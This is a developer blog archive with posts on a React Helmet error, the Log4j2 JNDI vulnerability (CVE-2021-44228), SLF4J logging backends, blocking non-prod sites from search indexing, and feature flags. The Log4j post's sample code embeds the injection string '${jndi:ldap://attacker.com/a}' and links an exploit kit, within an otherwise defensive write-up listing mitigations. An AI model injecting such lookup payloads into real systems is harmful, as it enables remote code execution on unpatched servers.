Wednesday, May 18, 2022

Uncaught TypeError: Cannot read properties of undefined (reading 'add') - React Helmet

I was getting the below error while using react-helmet to dynamically change the head section (meta tags, title, etc.); the pages were also not loading.

scheduler.development.js:171 Uncaught TypeError: Cannot read properties of undefined (reading 'add')

    at e.r.init (Dispatcher.js:53:1)

    at e.r.render (Dispatcher.js:67:1)

    at finishClassComponent (react-dom.development.js:17485:1)

    at updateClassComponent (react-dom.development.js:17435:1)

    at beginWork (react-dom.development.js:19073:1)

    at HTMLUnknownElement.callCallback (react-dom.development.js:3945:1)

    at Object.invokeGuardedCallbackDev (react-dom.development.js:3994:1)

    at invokeGuardedCallback (react-dom.development.js:4056:1)

    at beginWork$1 (react-dom.development.js:23964:1)

    at performUnitOfWork (react-dom.development.js:22776:1)

    at workLoopSync (react-dom.development.js:22707:1)

    at renderRootSync (react-dom.development.js:22670:1)

    at performSyncWorkOnRoot (react-dom.development.js:22293:1)

    at react-dom.development.js:11327:1

    at unstable_runWithPriority (scheduler.development.js:468:1)

    at runWithPriority$1 (react-dom.development.js:11276:1)

    at flushSyncCallbackQueueImpl (react-dom.development.js:11322:1)

    at workLoop (scheduler.development.js:417:1)

    at flushWork (scheduler.development.js:390:1)

    at MessagePort.performWorkUntilDeadline (scheduler.development.js:157:1)


To fix the issue

I replaced react-helmet with react-helmet-async:

npm install react-helmet-async or yarn add react-helmet-async

Then wrap the App element with HelmetProvider:

import { HelmetProvider } from 'react-helmet-async';

ReactDOM.render(
  <React.StrictMode>
    <HelmetProvider>
      <App />
    </HelmetProvider>
  </React.StrictMode>,
  document.getElementById('root')
);

Now Helmet can be used in individual components to change the dynamic head elements; note that the import now comes from react-helmet-async:

import React from 'react';
import { Helmet } from 'react-helmet-async';
import { Introduction, Details, BackToTop } from './components';

const Test = () => {
  return (
    <React.Fragment>
      <Helmet>
        <title>Test</title>
        <meta name="description" content="Test Description" />
        <meta property="og:title" content="Test" />
        <meta property="og:description" content="Test" />
      </Helmet>
      <Introduction />
      <Details />
      <BackToTop />
    </React.Fragment>
  );
};

export default Test;

After this, I noticed that none of the existing meta tags defined in index.html, apart from the title, were replaced with the new values. To fix that, I added data-rh="true" to the meta tags in index.html that need to be replaced.

<meta property="og:title" content="default value" data-rh="true" />

Somehow the data-react-helmet="true" attribute was not working for me.

Happy Coding!!!


Sunday, December 12, 2021

Apache Log4j2 Security Vulnerability (CVE-2021-44228) - Details | Apache Log4j2 Remote Code Execution through JNDI endpoints

A recently (09-Dec-2021) discovered vulnerability in Log4j 2 is reportedly being exploited in the wild, putting widely used applications and cloud services at risk. Log4j2 is an open-source Java logging framework managed by the Apache Software Foundation.

CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI-related endpoints.

The vulnerability CVE-2021-44228 allows remote code execution against LDAP and other JNDI-related endpoints - ${jndi:protocol://server}, e.g. ${jndi:ldap://attacker.com/a}. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.



While logging a message that contains a JNDI endpoint, the JNDI feature of the Log4j2 module tries to establish a connection to the JNDI URL specified in the log message. Through this, an attacker can make the system connect to a remote server and inject malicious code for execution (if a request parameter/header from the end user is logged directly through the Log4j2 logger).

Refer to https://logging.apache.org/log4j/2.x/security.html for more details on the issue.

All versions from 2.0-beta9 to 2.14.1 are impacted.

The issue is addressed in version 2.15.0, where the JNDI message lookup feature is disabled by default; upgrade the dependency to 2.15.0 to address the issue in your project. Apache has also documented, on the above URL, quick steps to mitigate the issue immediately without updating the dependency version.

A project using either of the following two dependency approaches with the impacted versions is affected; with these versions in place, the sample code further below produces a JNDI lookup exception.

Option 1: SLF4J Bridge for Log4j2

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-slf4j-impl</artifactId>
    <version>2.14.1</version>
</dependency>

Option 2: Log4j2 direct dependencies

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.1</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

Sample Code - Log4j2 direct dependencies

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Sample {

    private static final Logger log = LogManager.getLogger(Sample.class);

    public static void main(String[] args) {
        String header = "${jndi:ldap://attacker.com/a}";
        log.info("test");
        log.info("test: " + log.getClass() + header);
    }
}

Sample Code - SLF4J Wrapper

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class Sample {

    private static final Logger log = LoggerFactory.getLogger(Sample.class);

    public static void main(String[] args) {
        String header = "${jndi:ldap://attacker.com/a}";
        log.info("test");
        log.info(header);
    }
}

Error Message: The below error message is displayed while logging a message with a JNDI endpoint. The JNDI feature tries to establish a connection to the JNDI URL specified in the log message; through this, the attacker can make the system connect to a remote system and inject malicious code for execution (if the request parameter/header from the end user is logged directly through the Log4j logger). LDAP servers can store Java class files, so an attacker can host a malicious Java class on an LDAP server under their control and send its URL through request parameters or headers; when that value is logged directly through an impacted Log4j2 version, it can hand control of the system to the attacker (the attacker can also use a proxy LDAP server to serve a remote class with malicious code; refer to https://github.com/pimps/JNDI-Exploit-Kit for more details).



[INFO ] 2021-12-12 00:38:36.158 [main] Sample - test

2021-12-12 00:38:38,267 main WARN Error looking up JNDI resource [ldap://attacker.com/a]. javax.naming.CommunicationException: attacker.com:389 [Root exception is java.net.ConnectException: Connection refused: connect]

at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:244)

at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)

at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1616)

at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2847)

at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:348)

at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)

at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)

at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204)

at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)

at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)

at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)

at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)

at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:223)

at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1116)

at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1038)

at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)

at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:467)

at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)

at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)

at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:345)

at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:244)

at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:229)

at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)

at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)

at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)

at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)

at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)

at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)

at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)

at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)

at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543)

at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502)

at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485)

at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460)

at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)

at org.apache.logging.log4j.core.Logger.log(Logger.java:161)

at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2198)

at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2152)

at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2135)

at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2011)

at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1983)

at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1320)

at com.core.oauth.provider.azureadb2c.Sample.main(Sample.java:17)

Caused by: java.net.ConnectException: Connection refused: connect

at java.base/java.net.PlainSocketImpl.connect0(Native Method)

at java.base/java.net.PlainSocketImpl.socketConnect(PlainSocketImpl.java:101)

at java.base/java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:399)

at java.base/java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:242)

at java.base/java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:224)

at java.base/java.net.SocksSocketImpl.connect(SocksSocketImpl.java:403)

at java.base/java.net.Socket.connect(Socket.java:608)

at java.base/java.net.Socket.connect(Socket.java:557)

at java.base/java.net.Socket.<init>(Socket.java:453)

at java.base/java.net.Socket.<init>(Socket.java:230)

at java.naming/com.sun.jndi.ldap.Connection.createSocket(Connection.java:337)

at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:223)

... 42 more

In a real scenario, the remote class from the attacker's server would be executed, giving the attacker control of the system.

The issue can be addressed in multiple ways, but the recommended approach is to upgrade the dependency to the fixed version (2.15.0 at the time of writing); the other mitigations are:

  • WAF (Web Application Firewall) - block the malicious requests by enabling the required rules
  • Disable Log4j2 and use a different logger implementation - this should be easy if the SLF4J library is used; refer to https://www.albinsblog.com/2021/12/how-to-identify-which-logging-library-slf4j-using-for-logging.html for more details
  • Disable JNDI lookups - add -Dlog4j2.formatMsgNoLookups=true as a JVM parameter (java -Dlog4j2.formatMsgNoLookups=true …) or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true; refer to https://logging.apache.org/log4j/2.x/security.html for more details (a sketch for setting the flag programmatically follows this list)
  • Remove the JndiLookup class from the classpath - refer to https://logging.apache.org/log4j/2.x/security.html for more details
  • In JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1, com.sun.jndi.ldap.object.trustURLCodebase is set to false, meaning JNDI cannot load a remote codebase using LDAP; this blocks the LDAP remote code execution vector. Ensure the com.sun.jndi.ldap.object.trustURLCodebase Java system property is not set to true.
  • Java Serialization Filtering - whitelist only the known classes for deserialization; refer to https://medium.com/tech-learnings/serialization-filtering-deserialization-vulnerability-protection-in-java-349c37f6f416 for more details
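For reference, a minimal sketch (my own illustration, not from the Apache advisory) of setting the same no-lookups flag programmatically at application startup; this only takes effect if it runs before Log4j2 loads its configuration, so the JVM parameter or environment variable remains the safer option:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class NoLookupsBootstrap {

    public static void main(String[] args) {
        // Must run before the first LogManager.getLogger() call initializes Log4j2,
        // otherwise the already-loaded configuration ignores the flag
        System.setProperty("log4j2.formatMsgNoLookups", "true");

        Logger log = LogManager.getLogger(NoLookupsBootstrap.class);
        // The lookup pattern is now logged as literal text instead of being resolved
        log.info("${jndi:ldap://attacker.com/a}");
    }
}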

In the long run, we should validate/sanitize user inputs (request parameters/headers, etc.) before performing any activity on them, such as logging; this helps prevent malicious code injection.
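As an illustration only, a minimal sketch of such a sanitizer using a hypothetical LogSanitizer helper; stripping the lookup prefix is just one example of input sanitization and is not a substitute for upgrading the library:

public class LogSanitizer {

    // Removes the "${" sequence so Log4j2's string substitution never sees a lookup
    // expression such as ${jndi:ldap://attacker.com/a} in user-controlled values
    public static String sanitize(String input) {
        if (input == null) {
            return null;
        }
        return input.replace("${", "");
    }
}

Usage (hypothetical servlet context): log.info("User-Agent: {}", LogSanitizer.sanitize(request.getHeader("User-Agent")));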

Update Log4j2 to the latest library version (2.15.0):

Option 1: SLF4J Bridge for Log4j2

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-slf4j-impl</artifactId>
    <version>2.15.0</version>
</dependency>

Option 2: Log4j2 direct dependencies

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.15.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.15.0</version>
</dependency>

After upgrading the dependency versions, the actual message is displayed; no JNDI lookup is performed on the JNDI endpoint.

[INFO ] 2021-12-12 01:07:09.227 [main] Sample - test

[INFO ] 2021-12-12 01:07:09.230 [main] Sample - ${jndi:ldap://attacker.com/a}

The impact of the issue depends on how the project logs the request parameters/headers received from end users; the impact is lower if the values are filtered in any of the layers.

[Update 1]: 

A new Log4j2 version (2.16.0) has been released; the fix applied in 2.15.0 was not complete for all scenarios, so upgrade to the latest version (2.16.0) to address the issue completely. Refer to https://logging.apache.org/log4j/2.x/security.html for more details (CVE-2021-45046).

[Update 2]:

A new Log4j2 version (2.17.0) has been released; the fix applied in 2.16.0 was not complete and remained open to a DoS (Denial of Service) attack. Refer to https://logging.apache.org/log4j/2.x/security.html for more details (CVE-2021-45105).

Impact on Adobe Experience Manager(AEM)

Based on my analysis, AEM OOTB includes log4j v1.2.17, and since CVE-2021-44228 impacts Apache Log4j 2 (versions 2.0 to 2.14.1), there appears to be no immediate impact. This is my personal view; wait for confirmation from Adobe (please check with Adobe for any impact of this issue on AEM). However, you should address the issue if any of your custom projects on AEM embed the impacted Maven dependency versions.

[Update]

Based on a further update from Adobe, the AEM core product is not impacted by the Log4j2 JNDI lookup security issue, but custom code should be reviewed to ensure the impacted Log4j2 versions are not embedded; one way to check is shown below.
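For a Maven-based custom project (an assumption; adjust for other build tools), one way to spot impacted versions is to filter the dependency tree for Log4j artifacts:

mvn dependency:tree -Dincludes=org.apache.logging.log4j

Any log4j-core entry between 2.0-beta9 and 2.14.1 should be upgraded or mitigated as described above.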



Saturday, December 11, 2021

SLF4J - Simple Logging Facade for Java | How to identify which logging library SLF4J is using for logging?

The Simple Logging Façade for Java (SLF4J) serves as a simple façade or abstraction for various logging frameworks, such as java.util.logging, logback and log4j. SLF4J allows the end-user to plug in the desired logging framework at deployment time. It enables a generic API making the logging independent of the actual implementation.



SimpleLogger(org.slf4j.simple.SimpleLoggerFactory) - sends all log messages to the console using the “standard” error output stream (System.err).

NOPLogger(org.slf4j.helpers.NOPLoggerFactory) - All logging will be silently discarded. Starting with version 1.6.0, if no binding(logger implementation) is found on the classpath, this one will be used by default. 

SLF4J: No SLF4J providers were found.
SLF4J: Defaulting to no-operation (NOP) logger implementation
SLF4J: See http://www.slf4j.org/codes.html#noProviders for further details.

Log4j(org.slf4j.log4j12.Log4jLoggerFactory/org.apache.logging.slf4j.Log4jLogger) - A wrapper over the Log4j 1.2 loggers

Java Util Logging(org.slf4j.jul.JDK14LoggerFactory) - wrapper for the Java Util Logging logger

Logback Logging Framework(ch.qos.logback.classic.LoggerContext) - Wrapper for Logback Logging Framework

Dependencies:


SLF4J API Dependency:


<dependency>
    <groupId>org.slf4j</groupId>
    <artifactId>slf4j-api</artifactId>
    <version>2.0.0-alpha5</version>
</dependency>

Implementation Dependencies:


SimpleLogger:

<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-simple</artifactId>
<version>2.0.0-alpha5</version>
<scope>runtime</scope>
</dependency>

The logger configuration can be enabled by adding a "simplelogger.properties" file to the classpath (src/main/resources):

simplelogger.properties

org.slf4j.simpleLogger.logFile=System.out
org.slf4j.simpleLogger.defaultLogLevel=warn

Log4j 1.2:

<dependency>
    <groupId>org.slf4j</groupId>
    <artifactId>slf4j-log4j12</artifactId>
    <version>2.0.0-alpha5</version>
    <scope>runtime</scope>
</dependency>

While enabling the Log4j logging framework, log4j.properties should be added to the classpath (src/main/resources); a sample file:

log4j.properties

log4j.rootLogger=info, stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.stdout.layout.ConversionPattern=%-4r [%t] %-5p %c %x - %m%n

Log4j 2:

<!-- SLF4J Bridge -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-slf4j-impl</artifactId>
<version>2.15.0</version>
</dependency>

In this case, remove the explicit SLF4J API dependency (slf4j-api) and add only the above dependency; the bridge pulls in a compatible slf4j-api version transitively.

While enabling the Log4j 2 logging framework, log4j2.xml should be added to the classpath (src/main/resources); a sample log4j2.xml file:

log4j2.xml

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="INFO">
    <Appenders>
        <Console name="console" target="SYSTEM_OUT">
            <PatternLayout
                pattern="[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg%n" />
        </Console>
    </Appenders>
    <Loggers>
        <Root level="debug" additivity="false">
            <AppenderRef ref="console" />
        </Root>
    </Loggers>
</Configuration>


Java Util Logging:

<dependency>
    <groupId>org.slf4j</groupId>
    <artifactId>slf4j-jdk14</artifactId>
    <version>2.0.0-alpha5</version>
    <scope>runtime</scope>
</dependency>

The default logger configuration is available in $JAVA_HOME/conf/logging.properties; a custom logging.properties can be enabled if required. There are multiple ways to load the custom logging.properties: a JVM parameter (-Djava.util.logging.config.file=logging.properties), System.setProperty("java.util.logging.config.file", "logging.properties"), etc.; a programmatic sketch follows the sample file below.

logging.properties

handlers= java.util.logging.ConsoleHandler
.level= INFO
java.util.logging.ConsoleHandler.level = INFO
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter

com.demo.logging.level=INFO
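A minimal sketch (assuming logging.properties sits in src/main/resources so it ends up on the classpath) of loading the custom configuration programmatically instead of using the JVM parameter:

import java.io.InputStream;
import java.util.logging.LogManager;
import java.util.logging.Logger;

public class JulConfigLoader {

    public static void main(String[] args) throws Exception {
        // Assumes logging.properties is present on the classpath
        try (InputStream config = JulConfigLoader.class.getClassLoader()
                .getResourceAsStream("logging.properties")) {
            // Replaces the settings loaded from $JAVA_HOME/conf/logging.properties
            LogManager.getLogManager().readConfiguration(config);
        }
        Logger.getLogger(JulConfigLoader.class.getName()).info("custom JUL configuration loaded");
    }
}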

Logback Logging Framework

<dependency>
    <groupId>ch.qos.logback</groupId>
    <artifactId>logback-classic</artifactId>
    <version>1.3.0-alpha10</version>
</dependency>

The logger configuration can be enabled by adding a "logback.xml" file to the classpath (src/main/resources):

<configuration>
    <appender name="CONSOLE" class="ch.qos.logback.core.ConsoleAppender">
        <layout class="ch.qos.logback.classic.PatternLayout">
            <Pattern>
                %d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n
            </Pattern>
        </layout>
    </appender>

    <logger name="com.demo" level="debug" additivity="false">
        <appender-ref ref="CONSOLE" />
    </logger>

    <root level="error">
        <appender-ref ref="CONSOLE" />
    </root>
</configuration>

Ensure only one implementation is enabled for the project; if multiple providers are present, the latest SLF4J versions use the first implementation found on the classpath as the actual provider (see the exclusion sketch after the sample output below).

SLF4J: Class path contains multiple SLF4J providers.
SLF4J: Found provider [ch.qos.logback.classic.spi.LogbackServiceProvider@34b7bfc0]
SLF4J: Found provider [org.slf4j.jul.JULServiceProvider@366e2eef]
SLF4J: Found provider [org.slf4j.simple.SimpleServiceProvider@6df97b55]
SLF4J: Found provider [org.slf4j.log4j12.Log4j12ServiceProvider@3cbbc1e0]
SLF4J: See http://www.slf4j.org/codes.html#multiple_bindings for an explanation.
SLF4J: Actual provider is of type [ch.qos.logback.classic.spi.LogbackServiceProvider@34b7bfc0]
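If an unwanted provider arrives transitively, it can be excluded from the offending dependency; a sketch with a hypothetical com.example artifact that pulls in logback-classic:

<dependency>
    <groupId>com.example</groupId>
    <artifactId>some-library</artifactId>
    <version>1.0.0</version>
    <exclusions>
        <!-- Keep only the intended SLF4J provider on the classpath -->
        <exclusion>
            <groupId>ch.qos.logback</groupId>
            <artifactId>logback-classic</artifactId>
        </exclusion>
    </exclusions>
</dependency>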

Sometimes we need to identify which logging implementation SLF4J is using to log messages. This can usually be identified by looking at the logger implementation dependency added to the project, but sometimes the dependency comes transitively from external projects; the below APIs can be used to identify the actual implementation at runtime.

//
org.slf4j.Logger logger = org.slf4j.LoggerFactory.getLogger(Application.class);
System.out.println(logger.getClass());

Output - class org.slf4j.simple.SimpleLogger

//

LoggerFactory.getILoggerFactory().getClass().getName()

Output - ch.qos.logback.classic.LoggerContext

//

In earlier SLF4J versions, the below API is also supported:

org.slf4j.impl.StaticLoggerBinder.getSingleton().getLoggerFactory()

Output - ch.qos.logback.classic.LoggerContext[default]

Sample Java Class:

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class Sample {

    private static final Logger log = LoggerFactory.getLogger(Sample.class);

    public static void main(String[] args) {
        log.info("test");
        log.info(log.getClass().toString());
        log.info(LoggerFactory.getILoggerFactory().getClass().getName());
    }
}


Tuesday, January 12, 2021

Different Approaches to Block Non-Prod URL’s from search indexing

One of the major SEO concerns while working on a website is keeping non-production URLs out of search engine results (the index). Search engines can index a non-prod URL if it is linked from live URLs by mistake or exposed through other external links. Indexing of non-prod URLs can cause duplicate content issues that impact the ranking of the live URLs, and end users may access the non-production URL instead of the live one. It can also lead to compliance issues if content bound to compliance rules, or not-yet-live content, is exposed to end users.

In this tutorial let us discuss the details on how to block the non-prod URLs appearing from search engines.

You can search for site:<domainname>, e.g. site:www.albinsblog.com, to identify whether a specific domain is indexed by the search engine; you can also use third-party SEO tools to identify the URLs indexed in search engines.


Let us now see some of the options to block search engines from indexing non-production URLs.

HTTP Basic Authentication:

Server-side HTTP Basic Authentication blocks search engines from crawling and indexing the domain content. Enable HTTP basic authentication in the web server for the non-prod domains so that they are blocked for search engines while the live content is indexed as expected.

Basic Authentication for Apache 2.4 Virtualhost

<Location />
AuthType Basic
AuthBasicProvider file
AuthUserFile /etc/httpd/conf.d/.htpasswd
#create the user through htpasswd, htpasswd -c /etc/httpd/conf.d/.htpasswd testuser
AuthName "Authentication Required"
Require valid-user
</Location>

If the same configuration is shared across environments, enable the authentication conditionally (e.g. based on an ENV_TYPE environment variable or the incoming domain value):

<Location />
<If "'${ENV_TYPE}' =~ m#(dev|uat|stage)#">
AuthType Basic
AuthBasicProvider file
AuthUserFile /etc/httpd/conf.d/.htpasswd
AuthName "Authentication Required"
Require valid-user
</If>
<Else>
Require all granted
</Else>
</Location>

Basic authentication creates challenges while performance testing the websites in stage or other environments (as part of a pipeline or outside of it), mainly around caching behavior: responses on basic-authentication-enabled websites are skipped from caching. The workaround is to disable basic authentication whenever performance testing is executed in the environment (or execute the testing with basic authentication, accepting that the results will not reflect live behavior).

IP Restriction:

IP restriction allows only known IPs to access the non-production URLs. Whitelist the known IP ranges so that external search engines cannot crawl/index the non-production websites while the intended users can still access them for testing.

The IP restriction can be enabled in the load balancer or the web server; the web server gives the development team more control and flexibility to modify the restrictions whenever required.

IP restriction configuration for Apache 2.4 Virtualhost

<Location />
<RequireAny>
Require ip xxx.xx.0.0/24
Require ip xxx.xx.0.0/24
</RequireAny>
</Location>

If the same configuration is shared across environments, enable the IP restriction conditionally (e.g. based on an ENV_TYPE environment variable or the incoming domain value):

<Location />
<If "'${ENV_TYPE}' =~ m#(dev|uat|stage)#">
<RequireAny>
Require ip xxx.xx.0.0/24
Require ip xxx.18.0.0/24
</RequireAny>
</If>
</Location>

The main challenge of IP whitelisting is maintaining the whitelist rules while working with distributed teams and the dynamic IPs used to access the servers.

Robots Meta Tag:

The robots meta tag in the page source can help keep non-production URLs out of the search engine index. Enable the required robots meta tag in the page source; you need to apply custom logic to render the meta tag only for non-prod environments.

<meta name="robots" content="noindex, nofollow, noarchive, nosnippet, nocache" />

noindex — Do not show this page in search results.

nofollow — Do not follow the links on this page.

noarchive — Do not show a cached link in search results.

nosnippet — Do not show a text snippet or video preview in the search results for this page

nocache — Same as noarchive, but only used by MSN/Live.

The challenge with this approach is that the robots meta tag can be applied only to HTML resources, not to other assets (PDF, PNG, JPG, etc.). Also, compared to the above two approaches, the search engines still have to crawl each individual page to discover that it is not enabled for indexing.

Robots Meta Tag HTTP header:

The X-Robots-Tag HTTP response header can help keep non-production URLs out of the search engine index, and it can be enabled for both HTML documents and other assets. It is better to add this header to the response of all non-prod resources through the web server, e.g. Apache.

Configuration for Apache Virtualhost

Header set X-Robots-Tag "noindex, nofollow, noarchive, nosnippet, nocache"

If the same configuration is shared across environments, enable the header conditionally (e.g. based on an ENV_TYPE environment variable or the incoming domain value):

<Location />
<If "'${ENV_TYPE}' =~ m#(dev|uat|stage)#">
Header set X-Robots-Tag "noindex, nofollow, noarchive, nosnippet, nocache"
</If>
</Location>

This approach is much easier to manage than enabling the meta tag in the page source, but the search engines still have to crawl each individual page to discover that it is not enabled for indexing. A quick way to verify the header is shown below.
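For example (dev.example.com is a placeholder for your non-prod host), the header can be verified with:

curl -I https://dev.example.com/ | grep -i x-robots-tag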

Robots TXT:

The robots.txt file instructs search engines not to crawl the website through Disallow rules, but this does not ensure the pages are excluded from the index. Pages blocked by robots.txt can still appear in the index if they are linked from external sources.

Enable a simple robots.txt in the root of every non-prod website to block search engines from crawling the non-production URLs (ensure the same Disallow rules are not enabled for live sites by mistake, otherwise it will impact the live site's indexing):

User-agent: *
Disallow: /

This approach can be used along with the robots meta tag or HTTP header to block search engines from crawling the website content after the pages are removed from the index. If a page is already in the index, it should be removed from the index first before crawling is blocked through robots.txt; otherwise the search engine will not be able to crawl the page and see the meta tag or header enabled on it.

URL Removal:

The search engine URL removal tool can be used to remove an already indexed URL from the search engine (and from its cache) if something that should not be indexed, e.g. a non-prod URL, has been indexed.

The Removals tool enables you to temporarily block pages from Google Search results on sites that you own. A removal request is temporary and persists for at least 90 days; in the meantime, one of the approaches discussed above should be enabled to block the search engines completely from crawling and re-indexing the pages.

A specific URL, a specific section, or the complete site can be removed from the index (only the owner of the site property can perform this activity); for Google, this can be done through Google Search Console.


Authentication and IP restriction are the most reliable approaches to keep non-production URLs away from search engines. If these two approaches do not work for your case, try enabling the X-Robots-Tag HTTP header (or the robots meta tag if required) from the web server for non-prod domains, along with robots.txt blocking the crawling.



Tuesday, July 28, 2020

Trunk Based Development and Feature Flags for Continuous Delivery

Trunk Based Development is a branching model in which developers create short-lived feature branches and merge back into the “trunk” branch, often called the master branch.

The guiding principles of Trunk Based Development:

  • There is one “trunk” branch where developers merge their changes.
  • Developers should merge small changes as often as they can.
  • Merges must be reviewed, tested, and must not destroy the “trunk”.
  • All code in “trunk” must be release ready at all times.
  • Feature branches must be short-lived.
  • Keep your commit messages as concise as possible

Comparing Trunk Based Development to GitFlow


The Trunk Based Branching Model

The below model can be used for scaled teams: development is done on short-lived feature branches, and the changes are merged to the “trunk” often. For small teams, developers can merge changes directly to the “trunk” in small chunks.


Changes made in the release branches — snapshots of the code when it’s ready to be released — are usually merged back to trunk as soon as possible. One key benefit of the trunk-based approach is that it reduces the complexity of merging events and keeps code current by having fewer development lines and by doing small and frequent merges.

The developers should be experienced enough to make this model successful; it often creates conflicts if the changes are not reviewed and tested rigorously. Use this model if you are looking to push out a new product fast and want to iterate quickly.

Feature Development with Feature Flags

Trunk Based Development uses Feature Flags as a mechanism to manage new feature releases. A feature flag is simply a boolean condition that modifies the behavior of a component, module, or function in your application.

Following a Feature Flag pattern trades the simplicity of isolated branch workflows, such as GitFlow, in favor of flexible feature rollouts, continuous delivery, and application personalization.

Setting Up Feature Flags

A simple way to begin using feature flags is to maintain a single file containing your feature flags. Let us see how to manage the flags in TypeScript within a React application through a simple approach. The feature flags can also be managed through external tools like Optimizely or LaunchDarkly.

featureFlags.ts

const featureFlags = {
  hellowordnewfeature: false
};

export function getFeatureFlag(key) {
  return featureFlags[key] || false;
}

helloword.ts

// return feature based on the feature flag
import { getFeatureFlag } from "./featureFlags";

const createHelloWord = () => {
  if (getFeatureFlag("hellowordnewfeature")) {
    return createNewHelloWord();
  }
  return createOldHelloWorld();
};

Here the feature is selected based on the flag “hellowordnewfeature”: if the flag is “true”, the new feature (createNewHelloWord) is returned, else the old feature (createOldHelloWorld).

This TypeScript module (featureFlags.ts) can be extended to fetch the flags from external or internal services.
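For example, a minimal sketch assuming a hypothetical /api/feature-flags endpoint that returns a JSON map of flag names to booleans:

// featureFlags.ts (extended) - a sketch only; the endpoint and response shape are assumptions
let remoteFlags: Record<string, boolean> = {};

// Load the flag values once at application startup
export async function loadRemoteFlags(): Promise<void> {
  const response = await fetch("/api/feature-flags");
  remoteFlags = await response.json();
}

export function getFeatureFlag(key: string): boolean {
  return remoteFlags[key] ?? false;
}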

Existing Feature Development with Feature Flags

Existing feature development with feature flags is slightly more complex but offers more flexibility for continuous delivery and personalization.

Small Incremental Change

If the proposed feature is a small incremental change, we can modify an existing code path to augment behavior. Take for example adding a new calculation for the total.

featureFlags.ts

const featureFlags = {
  hellowordnewfeature: false,
  useNewcalculateTotal: true
};

